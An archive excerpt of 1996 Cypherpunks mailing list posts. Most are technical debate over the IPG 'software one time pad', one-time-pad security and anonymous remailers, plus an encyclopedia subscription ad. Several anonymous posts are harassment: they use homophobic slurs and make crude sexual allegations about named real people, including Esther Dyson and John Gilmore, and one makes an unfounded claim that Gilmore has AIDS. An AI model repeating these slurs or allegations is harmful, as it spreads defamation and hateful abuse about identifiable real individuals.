Message-ID: <Pine.SUN.3.94.961124035914.20738L-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Nov 1996 eli+@gs160.sp.cs.cmu.edu wrote:

> Maybe this one's different from all of those.  How valuable a secret
> would you like to wager on that?  If IPG wants credibility, they should
> retain a respected cryptographer, or several, to attack their scheme.

"They" attempt this nearly daily by trying to taunt c'punks into
evaluating the product for free.


--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer@dhp.com (Anonymous)
Date: Sun, 24 Nov 1996 01:38:25 -0800 (PST)
To: edyson@edventure.com
Subject: Re: Does John Gilmore eat ass?
Message-ID: <199611240938.EAA29906@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


aga <aga@dhp.com> writes:

> The question is, does this John Gilmore really take it
> up the ass?  Whether or not he is a FAGGOT is a very relevant issue
> here, and it must not be overlooked.

The Evil Queen of Cypherpunks swings both ways.  John Gilmore also
eats Dorothy Denning's (clean-shaven) pussy.  He won't eat Esther
Dyson's pussy because it smells so bad.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sun, 24 Nov 1996 03:15:30 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: John Gilmore eats ass at the EFF
In-Reply-To: <199611240831.AAA23014@abraham.cs.berkeley.edu>
Message-ID: <Pine.LNX.3.95.961124061012.30913B-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Nov 1996, John Anonymous MacDonald wrote:

> aga <aga@dhp.com> writes:
> 
> > The question is, does this John Gilmore really take it
> > up the ass?  Whether or not he is a FAGGOT is a very relevant issue
> > here, and it must not be overlooked.
> 
> The Evil Queen of Cypherpunks swings both ways.  John Gilmore also
> eats Dorothy Denning's (clean-shaven) pussy.  He won't eat Esther
> Dyson's pussy because it smells so bad.
> 

So now the truth comes out.

So this John Gilmore of the EFF is an AC/DC homosexual, huh?
They are the most dangerous kind.

And the EFF is the most dangerous kind of an organization;
one which alleges to be for freedom but is actually a censorous sham.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Sat, 23 Nov 1996 22:15:57 -0800 (PST)
To: Brad Dolan <bdolan@USIT.NET>
Subject: Re: (fwd) HOLLAND URGENT! HELP NEEDED! (fwd)
In-Reply-To: <Pine.GSO.3.95.961123121025.29417B-100000@use.usit.net>
Message-ID: <Pine.SUN.3.95.961124061049.24094K-100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Nov 1996, Brad Dolan wrote:

> ---------- Forwarded message ----------
> #From: "Hillel Barak" <freedom@netvision.net.il>

> the country, although they cannot go back anywhere. It concerns refugees
> who are excluded by the "Oslo Agreements", who fled or were expelled from
> the countries where they resided and who do not have a nationality or any

	So they need papers.
	How about a World Service Authority Passport, and ID Document.

	Then let the various countries decide how to ship them to 
	the next country --- whether it be The Netherlands, or Libya,
	or Canada.  

> European instances that those Palestinians who have been expelled from
> the Arab countries where they once resided have legally nowhere to go

	Now why does this part sound like _The Man Without A Country?_

        xan

        jonathon


		Ban Dihydrogen Monoxide Now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: beta@eb.com (Beta Test)
Date: Sun, 24 Nov 1996 07:51:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Britannica Online Subscription Offer
Message-ID: <9611241550.AA27780@eb.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Pathfinder Free Trial Participant,

Thank you for participating in this special free trial subscription
offer of Britannica Online exclusively for Time Warner's Pathfinder
users. This free trial will be ending soon, and I would like to
extend you a special discount to encourage you to become a
Britannica Online subscriber. I hope you have had ample opportunity
to sample all Britannica has to offer, and if you haven't used our
service recently, I encourage you to take these *final weeks* to
experience the only information resource offering this degree of
depth, breadth, and interactivity.  

	As a Pathfinder reader you know that NASA recently sent a
Mars probe to begin a 10-month interplanetary voyage.  Read our
"Mars" article to find out what scientists have already discovered
about the Red Planet, then follow an Internet link to the Los
Alamos National Laboratory to view craters on Mars.

	Are you interested in health and nutrition?  Review the
extensive "Nutrition" article in Britannica Online, and look for
the nutrient content in what you had for breakfast.

	Planning a trip over the holidays?  Visit our "Nations of
the World" feature to review the history, map, flag, and national
statistics of the country you're considering before you finalize
those travel plans.  

So whether you're interested in learning more about Mars, troubles
in Iraq, or the latest hurricane, Britannica Online is regularly
updated to give you access to articles on people, places, and
events around the world.  It includes the text of the entire
32-volume Encyclopaedia Britannica, plus more than 2100 articles
not available anywhere else.  Articles are written by notable
scholars in their fields of expertise, including more Nobel Prize
winners than any other encyclopedia.

For about 50 cents a day you'll have access to the only reference
source that combines the information power of the world's premier
encyclopedia with thousands of direct links to related
information.  

To sign-up for Britannica Online --
* Access the registration form at http://www.eb.com:195/bol/ by
  selecting either the monthly or annual subscription option
* Enter PTF149A in the promotion code box for an annual
  subscription of $149 (our normal $25 registration fee will be
  waived for you as a Pathfinder user)
  Enter PTF149M in the promotion code box for a monthly
  subscription of $14.95
* Review to make sure information is complete and accurate, then
  submit

Every day you and your family can learn something new about the
events that are making history now. Your free trial will end in
two weeks, so please don't let this opportunity pass you by. 
I'm positive you'll discover that finding quality information
has never been easier.  

Sincerely,
Lisa Girolimetti
Marketing Manager, Online Products
Encyclopaedia Britannica, Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 25 Nov 1996 11:24:44 -0800 (PST)
To: snow <snow@smoke.suba.com>
Subject: Re: IPG Algorith Broken!
Message-ID: <848946795.108071.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



>      The algorythm cannot be considered secure until it has been 
> peer-reviewed. They refuse to release the algorythm for review, simply saying
> that "you can't break the code" therefore "it is secure". 

This isn`t strictly true. Don Wood (spit) has actually released the 
algorithm details for review. It`s just that no-one considers it even 
worthy of looking at. I wearily downloaded the details then realised 
I had better things to do than sift through pages of pompous self 
important drivel about "software one time pads."


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 25 Nov 1996 12:14:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: (Fwd) New Mersenne Prime!
Message-ID: <848946796.108078.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------

New Mersenne Prime!  2^1398269-1 is prime!
------------------------------------------

Thanks to everyone's hard work, GIMPS (Great Internet Mersenne Prime Search)
has discovered the 35th known Mersenne Prime!  Joel Armengaud made the 
discovery on November 13.  Amazingly, he kept this secret while he
double-checked the find on two other computers.  On the 18th, he notified
Richard Crandall, Chris Caldwell, and myself.  I verified it on my machine
on the 20th.  Slowinski, who was out of town at the time, provided the
independent verification on the 22nd.

More information can be found at these three web sites:
	http://www.sjmercury.com/business/compute/prime1122.htm
	http://ourworld.compuserve.com/homepages/justforfun/1398269.htm
	http://www.utm.edu/research/primes/notes/1398269.html

As had been agreed upon before hand, credit for this new prime will go
to Armengaud, Woltman, et. al.



  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 25 Nov 1996 13:04:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
Message-ID: <848946795.108068.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



>Is the concept here that:  Whereas conventional crypto generates/hashes
>a *key* with which to encode the text, IPG generates a *pad* from a key,
>more or less the length of the text, with which to encode the text??

It makes no difference whatsoever, no PRNG can have more entropy in 
the output stream than there was in the initial seed. Indeed, in 
general, the longer the PRNG runs for the more chance an adversary 
has of breaking it due to an increased amount of output.

>It seems to me they're putting an additional layer of stuff ("OTP") between
>the key generation and the actual encoding, so what's the problem with that,
>as a concept?

Well for a start it`s not a one time pad because that requires a 
totally real random pad. They have a stream cipher, as for whether it 
is any good or not I would normally not trust a man with the talent 
for bullshit Don Wood has.


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 24 Nov 1996 08:22:30 -0800 (PST)
To: snow <snow@smoke.suba.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611240820.CAA03712@smoke.suba.com>
Message-ID: <Pine.SUN.3.94.961124112020.1802A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



> > On Sat, 23 Nov 1996, John Anonymous MacDonald wrote:
> > > diGriz
> > 
> > Use an anon. remailer and sign your posts.  Brilliant.  Just brilliant.

Actually, rather clever if you're trying to estlablish reputation.  Just
make sure you use the right key.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 24 Nov 1996 08:41:55 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Recovery after flood
In-Reply-To: <T52VXD10w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.94.961124113821.1802C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Date: Sun, 24 Nov 96 03:15:40 EST
> From: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
> To: cypherpunks@toad.com
> Subject: Recovery after flood
> 
> I'd appreciate a response from M.Aldrich and anyone else who's into disaster
> recovery:
> 
> Someone I know had their (paper) files submerged in water. Now all the papers
> (most of them xerocopies, some photographs) are stuck together. They are, of
> course, confidential to some degree. Can someone refer us to someone in
> the Boston area who could assist in recovering the files?

Try the restoration departments of the suburb Boston Museums.
Expect to pay out the nose and rectum.

> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Sun, 24 Nov 1996 12:18:49 -0800 (PST)
To: snow <snow@smoke.suba.com>
Subject: Don Woods -- Crypto Creationist
Message-ID: <3.0.32.19961124114330.00dc0bec@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:18 AM 11/24/96 -0600, snow wrote:

>     The algorythm cannot be considered secure until it has been 
>peer-reviewed. They refuse to release the algorythm for review, simply saying
>that "you can't break the code" therefore "it is secure". 

Furthermore, in "Real Science", the burden of proof is on the one making
the claim, not on the one everyone else to disprove it.

So far Mr. Wood has not provided any *proof* as to the substance of his
claims.  He has provided some of the more interesting rants I have seen of
late.  (Analysis of his style of posting is probibly better left to the
Psychceramics list than Cypherpunks.)

Until he posts the algorythm (or at least some basis as to why we should
trust his claims), his claims are worthless.  (As they would say on
talk.origins: "Evidence is the coin of the realm here!".)

The reason that names like Shamir and Rivest and the host of others are
trusted is because their material has been reviewed by the rest of the
cryptographic community for errors.  They have a reputation in the
community.  Mr. Woods does not.  He has to earn it.  So far he has not done
so...

---
|              "Remember: You can't have BSDM without BSD."              |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Sun, 24 Nov 1996 12:18:48 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: IPG Algorith Broken!
Message-ID: <3.0.32.19961124115028.00dc1358@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:00 AM 11/24/96 -0500, Black Unicorn wrote:
>On Sun, 24 Nov 1996 eli+@gs160.sp.cs.cmu.edu wrote:
>
>> Maybe this one's different from all of those.  How valuable a secret
>> would you like to wager on that?  If IPG wants credibility, they should
>> retain a respected cryptographer, or several, to attack their scheme.
>
>"They" attempt this nearly daily by trying to taunt c'punks into
>evaluating the product for free.

Then someone should not do it for free.  They should do it as a "data
recovery tool", advertise widely, make a few bucks, and show what a piece
of crap the IPG snakeoil is in the first place.

Cracktools are starting to become a profitable business as more and more
snakeoil products appear on the market.  (Most are marketed to law
enforcement, but that will probibly change...)

There is a buck or two to be made here.

---
|              "Remember: You can't have BSDM without BSD."              |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Sun, 24 Nov 1996 12:20:29 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: IPG Algorith Broken!
Message-ID: <3.0.32.19961124120423.00dc1358@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 AM 11/24/96 -0500, Black Unicorn wrote:
>
>> > On Sat, 23 Nov 1996, John Anonymous MacDonald wrote:
>> > > diGriz
>> > 
>> > Use an anon. remailer and sign your posts.  Brilliant.  Just brilliant.
>
>Actually, rather clever if you're trying to estlablish reputation.  Just
>make sure you use the right key.

Reputation is not the only reason to use a "name" with an anon remailer.
Sometimes you want to post (and have a reputation) that is entirely
seperable from your "real life" persona.  Maybe you have a job where being
involved with "The Evil Cypherpunks(tm)" could result in hastles at work
(or even firing) if known.  (I recieved flack from one company I worked
with for posting here... Until they needed a remailer set up and someone to
explain how their software worked...  But that is another story.)

Cypherpunks is gated to a number of Usenet News servers.  (Teleport is a
good example.)  It is also archived in a number of search engines.
(Altavista if I remember correctly, is one of them.)  Someone who does not
want their words to come back any byte them might just use such a method to
protect themselves.

---
|              "Remember: You can't have BSDM without BSD."              |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@count04.mry.scruznet.com
Date: Sun, 24 Nov 1996 13:45:09 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <cypherpunks@count04
Subject: Re: Recovery after flood
In-Reply-To: <Pine.SUN.3.94.961124113821.1802C-100000@polaris>
Message-ID: <199611242147.NAA02431@count04.pleiku.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi Dimitri,
     depends on whether the binder in the glue is sticking or just
plain simply mud, if the documents are NOT fragile antiquities and
instead are modern photocopy paper and modern photographic papers
experiment in a very small area of the doc with freon tape cleaner
(it evaporates very rapidly) to try and free the areas of stickage
try other solvents also(this is how I cleaned a stack of crypto proceedings
that had been cat peed and stuck together), hope its going better for you..

   cheers
   kelly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 24 Nov 1996 06:19:09 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611240241.SAA29110@netcom6.netcom.com>
Message-ID: <Pine.LNX.3.94.961124141239.15389B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 23 Nov 1996, Bill Frantz wrote:

> At  4:21 PM 11/23/96 -0800, John Anonymous MacDonald wrote:
> >At 12:33 PM 11/23/1996, Eric Murray wrote:
> >>You point could have been that the same problem exists
> >>for proofs- that next week someone could come up
> >>with a way to prove, for all time, that an algorithim
> >>really IS unbreakable.  So, to cover that posibility
> >>I should have said "it's currently impossible to
> >>prove an algorithim unbreakable". :-)
> >
> >Or, more accurately, nobody credible has seen such a proof.  But, a
> >clever person might invent one.
> 
> I thought Shannon proved one-time-pads to be unbreakable using information
> theory.

Different ball game.  OTP isn't "unbreakable" .  OTPs are secure because
no matter what key you use, it _will_ decrypt, so your plaintext is still
hidden simply because it could decrypt to whatever the person trying to
decrypt it wants it to.  Its not that its unbreakable, its that its
breakable in _so many ways_.  

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

Do, or do not; there is no try.
		-- Yoda


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMphYvDCdEh3oIPAVAQGVWQf/UGedrHA9F0wqBBn0aUGNpP/0D2TOVTGm
JBKhsCHoACMhowkHGMSEumnWQZ8mJ1pUAht306p2smVd+XWqRia1c73fwES+a/9X
PEjaW3f6e8vsGnfQBlft0gEtaGzbwN9Dpbg01qxbpsLo9G0WqcrK8mHbOUISODjl
uyRbVZXvpdL88pNMDsoc/4p1MhTY+2eYZvp/CSfQZNjn+mSnD8MVO/EyFSfWj5t2
oEiO1R+h0xN6KHPwv8jDybuelbs8voCHEDY5rDFGB5VKsI+9nqStPwUVb39S0Vec
z5UPdrUUpfXP1aGxASYN9A88OLhzR00zCvtOPB/cp48FS6zC1PcH/A==
=7Ik9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sven <sven@loop.com>
Date: Sun, 24 Nov 1996 14:32:45 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: GELP/was:Word List
Message-ID: <2.2.32.19961124223123.009dd8b0@pop.loop.com>
MIME-Version: 1.0
Content-Type: text/plain



>That should be a "what" is GELP.

It's a type of sea weed.

GOAT
|__
   |--> SVEN: a.k.a. Chris Blanc
        Internet consulting/Web design
		
		[ http://www.loop.com/~sven/ ]

Some only sample the dark wine of life's blood...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 24 Nov 1996 06:54:43 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <3297C65F.4F7@gte.net>
Message-ID: <Pine.LNX.3.94.961124145135.15531A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 23 Nov 1996, Dale Thorn wrote:

> Igor Chudov @ home wrote:
> > Black Unicorn wrote:
> > > On Sat, 23 Nov 1996, Eric Murray wrote:
> > > > John Anonymous MacDonald writes:
> > > > > At 8:09 AM 11/23/1996, Eric Murray wrote:
> > > > > >No, you can't.  It's impossible to prove an algorithim unbreakable.
> 
> > > > > No?  Please prove your assertion.
> 
> > > > You can't prove a negative.  The best IPG could say is that
> > > > it can't be broken with current technology.
> > > > Next week someone might come up with a new way
> > > > to break ciphers that renders the IPG algorithim breakable.
> 
> > > Someone needs to write an IPG and Don Wood FAQ.  No, I'm not volunteering.
> 
> If you want to do that, why not do so as a response to Don's FAQ?
> 
> > As a crypto amateur, I would appreciate a good technical explanation as
> > to why IPG's algorithm cannot be considered secure.
> 
> Is the concept here that:  Whereas conventional crypto generates/hashes
> a *key* with which to encode the text, IPG generates a *pad* from a key,
> more or less the length of the text, with which to encode the text??
> 
> It seems to me they're putting an additional layer of stuff ("OTP") between
> the key generation and the actual encoding, so what's the problem with that,
> as a concept?

a) what they're claiming is OTP isn't OTP.  They use algorithmicly
generated "random" numbers.  Random numbers can't be algorithmicly
generated.  If the numbers in "OTP" aren't random, it isn't OTP.  Its also
very vulnerable.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

Traveling through hyperspace isn't like dusting crops, boy.
                -- Han Solo


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMphhTDCdEh3oIPAVAQHkUwf/TrWD92xbC+jE+FT4rZ0OFeNmhwqrd+wn
nQOuazsKxmeK9+Kcp8/RUX9gQB6zIDiweEJJYStZvN/U+PEWOxOlFbaoFyMw5iVv
t832kYmtuNS1mqOwN8FK1EJrV6m3dI+zLq1+svfjwkKOpmwhMJsOyYEkiR9zuH9a
68Bdlioksutw/GIfkfQ6NFIgGxhN5736Mg6On8rq8Y+pdgg6ce3vIsxYydj/bE8s
W2v//wNFSvLY0iOVK0weHX9rGL1W0ITH34gfiSct6cZZYLMdxynjLm+NmENontQo
mW9ry3h9t/H/IwadXLt3I3PjzY6pNiQYmMWXuNk5X43rjV2wPweCCQ==
=uZnB
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 24 Nov 1996 07:12:07 -0800 (PST)
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611240904.BAA23488@abraham.cs.berkeley.edu>
Message-ID: <Pine.LNX.3.94.961124150747.15531B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 24 Nov 1996, John Anonymous MacDonald wrote:

> 
> At 6:56 PM 11/23/1996, The Deviant wrote:
> >On Sat, 23 Nov 1996, John Anonymous MacDonald wrote:
> >> The good news is that you can prove a negative.  For example, it has
> >> been proven that there is no algorithm which can tell in all cases
> >> whether an algorithm will stop.
> >
> >No, he was right.  They can't prove that their system is unbreakable.
> >They _might_ be able to prove that their system hasn't been broken, and
> >they _might_ be able to prove that it is _unlikely_ that it will be, but
> >they *CAN NOT* prove that it is unbreakable.  This is the nature of
> >cryptosystems.
> 
> Please prove your assertion.
> 
> If you can't prove this, and you can't find anybody else who has, why
> should we believe it?

Prove it?  Thats like saying "prove that the sun is bright on a sunny
day".  Its completely obvious.  If somebody has a new idea on how to
attack their algorithm, it might work.  Then the system will have been
broken.  You never know when somebody will come up with a new idea, so the
best you can truthfully say is "it hasn't been broken *YET*".  As I
remember, this was mentioned in more than one respected crypto book,
including "Applied Cryptography" (Schneier).

> diGriz

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

"All in all is all we are."
		-- Kurt Cobain


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMphlZjCdEh3oIPAVAQF6xQf+Is1KFSNZQexVQeCP6eDywN8Zv4iuUVX4
xmzzwNrziDO5rKZk1o6ol4G7oEk4EBi9OQOSC9ph12USjMYNLuqZGKcTSRlhgnb7
Jd9llDxpGlITI8omeYVGxlClUgwNYdudKVTCcpsElF4bR2uY066J9uyWeJIUhL13
F7cc+SD6iBtYOaGudAMheEaW+wzM4kcgSiNFWO6rDkU3LKNlqg2LEcjeZGIW8QQh
nxD06NKm807Cue/EiPYxwJmoQHFlZ5VjCkONj8GCgayBLUkJXIK6JIexQg9BS/Bx
RlV38j0OcCbtyzm4xcF+jEcNO6+7rrUC6TSW07k5jyjZXik/K6lZ/Q==
=M1Yr
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 24 Nov 1996 15:49:56 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: IPG Algorith Broken!
Message-ID: <199611242349.PAA02899@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:16 PM 11/24/96 +0000, The Deviant wrote:
>On Sat, 23 Nov 1996, Bill Frantz wrote:
>> I thought Shannon proved one-time-pads to be unbreakable using information
>> theory.
>
>Different ball game.  OTP isn't "unbreakable" .  OTPs are secure because
>no matter what key you use, it _will_ decrypt, so your plaintext is still
>hidden simply because it could decrypt to whatever the person trying to
>decrypt it wants it to.  Its not that its unbreakable, its that its
>breakable in _so many ways_.  

I think we differ on the definition of "unbreakable".  A quick stab at my
(admittedly very vague) definition includes the inability of the analyst to
determine (by the structure of the plaintext) that he has a correct
decryption.

When I look in AC2, Schneier uses "break" in many ways.  Let me evaluate
OTP against his taxonomy of attacks:

Ciphertext-only:   Unbreakable
Known-plaintext:   Unbreakable, since the pad is never reused
Chosen-plaintext:  Unbreakable, ditto
Adaptive-chosen-plaintext: Unbreakable, ditto
Chosen-ciphertext: This attack doesn't seem to apply
Chosen-key:        This attack requires that the OTP doesn't have 
                   1-bit-of-entropy/bit which implies it isn't an OTP.
Rubber-hose:       Since any decryption is equally plausable, OTPs are
                   resistant to this attack.  OTOH, it means they may 
                   keep beating you even after you've given them the
                   correct decryption.
Purchase-key:      This attack seems the only way to break an OTP.
 
If you accept Purchase-key as a valid attack, and it certainly has worked
in many real-life situations, then no system is "unbreakable" and there is
not any point in using the term.  If you leave it out of the valid forms of
attack, because all systems are vulnerable to it so it doesn't help in
selecting a cryptosystem, then the OTP is "unbreakable".

How do you want to define "unbreakable"?


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 24 Nov 1996 15:50:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Aga is talking to himself
Message-ID: <199611242349.PAA02909@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:15 AM 11/24/96 -0500, aga <aga@dhp.com> wrote:
>On Sun, 24 Nov 1996, John Anonymous MacDonald wrote:
actually the message was from lucifer@dhp.com:

>> aga <aga@dhp.com> writes:
... messages suppressed

It looks like our juvenile "friend" is talking to himself.  I am truely
sorry that he feels a need to harass ladies who have actually made
something of their lives.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 24 Nov 1996 16:51:11 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Killfiling stupid faggots
Message-ID: <199611250039.QAA06444@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


abostick@netcom.com (Alan Bostick) writes:
>
> In article <199611220304.VAA02832@manifold.algebra.com>,
> ichudov@algebra.com (Igor Chudov @ home) wrote:
>
> > Dr. John Martin Grubor is the most harmless and most entertaining
> > among all kooks.
> >
> > His posting volume is a bit high, but other than that DrG never
> > got anyone in trouble.
>
> I dunno about "harmless".  Publishing lists of "known homosexuals"
> can have repercussions that outweigh their entertainment value.

Yes. John Gilmore met Alan Bostick through Grubor's list.
They fucked each other in the ass (how's that for entertainment!)
but now John Gilmore has AIDS.

P.S. Whoever said Gilmore is bi and eats pussy is a fucking liar.
Gilmore is 100% queer. He hasn't touched pussy since he was born.

diGriz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 24 Nov 1996 13:53:55 -0800 (PST)
To: aga <aga@dhp.com>
Subject: [Noise] Re: Thanks/was:This is your last warning
In-Reply-To: <Pine.LNX.3.95.961124121241.5205A-100000@dhp.com>
Message-ID: <Pine.SUN.3.94.961124162856.5157A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Nov 1996, aga wrote:

> > > Not really, I had an I.Q. of 149, and a perfect 4.00 from
> > > two different colleges, before I did my Doctorate in Law.
> > 
> > 149 puts you at the low end of the scale, or used to, around here.
> > 
> 
> True, they say genius only starts at 150; but I think I have
> improved since then.

This betrays your ignorance.  I.Q. is scaled according to age.  One does
not "improve."

> > The fact (if true) that you bothered to get a Doctorate in Law, rather
> > than a Juris Doctor, tends to disprove the above however.
> > 
> 
> Look dude, a Juris Doctor IS a Doctorate of Law.

Incorrect.

One can obtain a Doctorate in Law, (As in Dr.) but it is generally a
pointless endeavor except in some civil law jurisdictions.  (Liechtenstein
is a good example, where many attornies have a Dr.Iur. (Dr.) while others
merely have a Lic.Iur. (J.D.) ).

A J.D. requires no dissertation.
A Doctorate in Law does.

I submit you know too little about any of these to have attained either
one.

> Do not confuse it with a L.L.D. which is a "Doctorate
